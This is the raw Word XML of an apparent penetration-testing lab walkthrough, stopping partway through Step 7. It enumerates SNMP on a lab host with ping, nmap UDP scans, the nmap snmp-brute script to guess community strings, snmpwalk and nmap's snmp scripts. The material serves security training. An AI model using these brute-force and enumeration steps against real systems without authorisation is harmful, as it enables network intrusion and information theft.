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BFEC0" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t> Open the lab link to access the Kali GUI instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7318DEEB" w14:textId="3BD5CD68" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F11C47" wp14:editId="0DC8B122">
            <wp:extent cx="5943600" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1336923976" name="Picture 28"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onten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048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2CCF0A" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t> Check if the machine/domain is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0F7B3C" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F7AD60" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">ping -c 5 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="62C30A06" w14:textId="2DF18EA2" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26F9ABAE" wp14:editId="2AD90741">
            <wp:extent cx="5823249" cy="2692538"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="130424086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40867" name="Picture 1304240867"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5823249" cy="2692538"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F647353" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>The machine is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA92D9C" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t> Check open ports on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2447C09F" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB54C7B" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:lastRenderedPageBreak/>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1943F7C8" w14:textId="27B058D4" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="334C7D3B" wp14:editId="3B866D4C">
            <wp:extent cx="5575587" cy="2114659"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="2104279343" name="Picture 3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79343" name="Picture 30" descr="A screen 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575587" cy="2114659"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F85791D" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>We can notice, multiple ports are open on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8435FD" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t> Now, let's check if the SNMP port is open or not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5117E654" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">We must keep in mind that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> does not check for UDP ports by default. As we already know, SNMP runs on the UDP port 161.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEBFFEE" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>Therefore, let's check if this specific is opened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C61804" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E942107" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> -p 161 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="73C3DFA2" w14:textId="53DD7963" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7286B06A" wp14:editId="6BBB3A5D">
            <wp:extent cx="5181866" cy="1682836"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1393749075" name="Picture 3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49075" name="Picture 31" descr="A screen shot of a computer cod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181866" cy="1682836"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C673EBE" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>As we can see, the UDP port 161 is open. This information is crucial for our following tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDEC049" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> We will have to double-check </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> results by sending SNMP requests to the host and checking if we get responses from both. Sometimes, when host-based firewalls protect the hosts, they may confuse the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> scan results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F83925F" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t> Now, we need to find the SNMP server community string to access the target machine service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75934F41" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:lastRenderedPageBreak/>
        <w:t>First, we need to discover the community strings to access the SNMP service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F545D7C" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">Note: If you are not familiar with SNMP terms like communities, please, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> at the course material.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5293350A" w14:textId="087C01C5" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">We could use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>snmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>-brute script to find the community string. The script uses the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>snmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t>communities.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t> list for brute-forcing it is located inside /usr/share/nmap/nselib/data/snmpcommunities.lst directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7466960C" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E974D43" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>161 --script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>snmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">-brute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2D7BC368" w14:textId="1E51FE0D" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A8C09DF" wp14:editId="4785C0F7">
            <wp:extent cx="5385077" cy="2279767"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="156901361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13613" name="Picture 1569013613"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5385077" cy="2279767"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00042BE0" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>As we can see, we found three community names: public, private, and secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B13E19B" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> Now, let's run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> tool to find all the information via SNMP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C2B7C1" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> is an SNMP application that uses SNMP GETNEXT requests to query a network entity for a tree of information. An object identifier (OID) may be given on the command line. This OID specifies which portion of the object identifier space will be searched using GETNEXT requests. All variables in the subtree below the given OID are queried and their values presented to the user. Each variable name is given in the format specified in variables. If no OID argument is present, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> will search the subtree rooted at SNMPv2-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>SMI::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>mib-2 (including any MIB object values from other MIB modules, that are defined as lying within this subtree). If the network entity has an error processing the request packet, an error packet will be returned and a message will be shown, helping to pinpoint why the request was malformed. If the tree search causes attempts to search beyond the end of the MIB, the message "End of MIB" will be displayed. Source [https://linux.die.net/man/1/snmpwalk]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D100A2E" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">We are running the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> command on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6360DA" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E875261" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> -v 1 -c public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="48701C25" w14:textId="77777777" w:rsidR="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>-v: Specifies SNMP version to use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE47E4D" w14:textId="5B8FD844" w:rsidR="008D04B8" w:rsidRPr="000A2232" w:rsidRDefault="008D04B8" w:rsidP="000A2232">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="386895E0" wp14:editId="05AE34A2">
            <wp:extent cx="5842300" cy="2146410"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="66369585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95854" name="Picture 663695854"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5842300" cy="2146410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF4872B" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t>-c: Set the community string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69180DF7" w14:textId="77777777" w:rsidR="008D04B8" w:rsidRDefault="008D04B8" w:rsidP="000A2232"/>
    <w:p w14:paraId="32F23A4A" w14:textId="39395FAC" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E2CA834" wp14:editId="5284518D">
            <wp:extent cx="5943600" cy="1224501"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="998959928" name="Picture 23"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ontent Imag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59420"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1224501"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B2EF2B" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">We were able to gather a lot of information via SNMP. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>But,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> this isn't in a proper readable format. We need to take the help of other tools, i.e., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> SNMP scripts, for specific information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188E06A3" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> Let's run all the SNMP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> scripts to gather all possible information via the SNMP service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA14FAB" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167A0C4B" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> -p 161 --script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>snmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">-* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A2232">
        <w:t>snmp_output</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6336636C" w14:textId="376D1FED" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="008D04B8" w:rsidP="000A2232">
      <w:r>
        <w:t>cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38911FB2" w14:textId="77777777" w:rsidR="000A2232" w:rsidRPr="000A2232" w:rsidRDefault="000A2232" w:rsidP="000A2232">
      <w:r w:rsidRPr="000A2232">
        <w:t xml:space="preserve">The above command would run all the </w:t>
      </w:r>
